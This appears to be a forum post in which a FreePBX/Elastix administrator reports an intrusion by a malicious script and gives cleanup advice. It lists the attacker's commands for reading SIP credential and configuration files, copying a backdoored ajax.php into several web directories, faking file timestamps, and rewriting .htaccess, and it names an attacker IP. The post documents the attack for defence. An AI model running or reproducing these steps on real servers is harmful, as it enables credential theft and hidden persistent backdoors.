K.php - a RestApps malicious script

Exploit script steals SIP information and configs:

ls -la
ps -aux --forest
asterisk -rx ‘core show channels’
asterisk -rx ‘sip show peers’
cat /etc/elastix.conf
cat /etc/asterisk/sip_additional.conf
cat /etc/asterisk/extensions_custom.conf
cat /etc/amportal.conf

So after clean you need to change all passwords in internal and external SIP accounts

In my case exploit modify some ajax.php, config.php, .htaccess and create self scripts.
So I deleted them and reinstall modules for original scripts versions.

Some exploit modifications:

/var/www/html/admin/views/ajax.php
mkdir -p /var/www/html/digium_phones/
mkdir -p /var/www/html/rest_phones/
cp /var/www/html/admin/views/ajax.php /var/www/html/rest_phones/ajax.php
cp /var/www/html/admin/views/ajax.php /var/www/html/admin/modules/core/ajax.php
cp /var/www/html/admin/views/ajax.php /var/www/html/digium_phones/ajax.php
cp /var/www/html/admin/views/ajax.php /var/www/html/admin/assets/js/config.php
cp /var/www/html/admin/views/ajax.php /var/www/html/admin/assets/config.php
cp /var/www/html/admin/views/ajax.php /var/www/html/admin/assets/ajax.php
touch /var/www/html/admin/views/ajax.php -r /var/www/html/admin/views/footer.php

RewriteEngine On

enable symbolic links

Options +FollowSymLinks
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-l
RewriteRule ^\s+ config.php [L] /var/www/html/admin/views/.htaccess

Changed ~/.bashrc and ~/.bash_profile is reason of command line inaccessible after login without ability FreePBX connect to ip 37.49.230.74

1 Like